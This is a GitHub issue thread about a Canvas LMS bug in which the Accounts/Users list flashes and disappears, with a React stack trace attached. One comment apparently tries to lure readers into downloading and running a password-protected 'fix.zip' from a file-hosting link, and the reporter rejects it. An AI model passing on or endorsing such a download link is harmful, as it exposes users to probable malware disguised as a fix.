### ISSUE TITLE
user list flashes and removes listing of people

### ISSUE THREAD

**Issue by DoctorOgg** [instructure/canvas-lms#2403]
### Summary: 

Accounts / Users list breefly shows, then disappears, 

### Steps to reproduce:

 1. followed the production install guide and checked out stable/2024-09-11
 2. navagte to accounts/1/users
 

```
TypeError: undefined is not an object (evaluating 'p.is_provider')
(anonymous function) — TempEnrollUsersListRow.tsx:177
R — TempEnrollUsersListRow.tsx:205
Row — UsersListRow.jsx:57
l0 — react-dom.production.min.js:153:148
iM — react-dom.production.min.js:175:312
aH — react-dom.production.min.js:246:268
(anonymous function) — react-dom.production.min.js:246:197
aR — react-dom.production.min.js:246:199
(anonymous function) — react-dom.production.min.js:123:117
(anonymous function) — scheduler.production.min.js:19:467
r5 — react-dom.production.min.js:123
r8 — react-dom.production.min.js:122:496
aF — react-dom.production.min.js:230:156
ip — react-dom.production.min.js:163:515
activeSuccess — index.js:28
(anonymous function) — index.js:138
c — tslib.es6.mjs:147
i — _async_to_generator.js:3
l — _async_to_generator.js:20
```

### Expected behavior:

user list is shown 

### Actual behavior:

the list breefly appears, and then diappers

![image](https://github.com/user-attachments/assets/f93cd36b-c138-4206-b688-037a3b389b9d)

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DoctorOgg** [comment]
@Bongton are you serious? like im going to down load a random file and just run it?

**Comment by DoctorOgg** [comment]
issue seems to be resolved, closing this issue
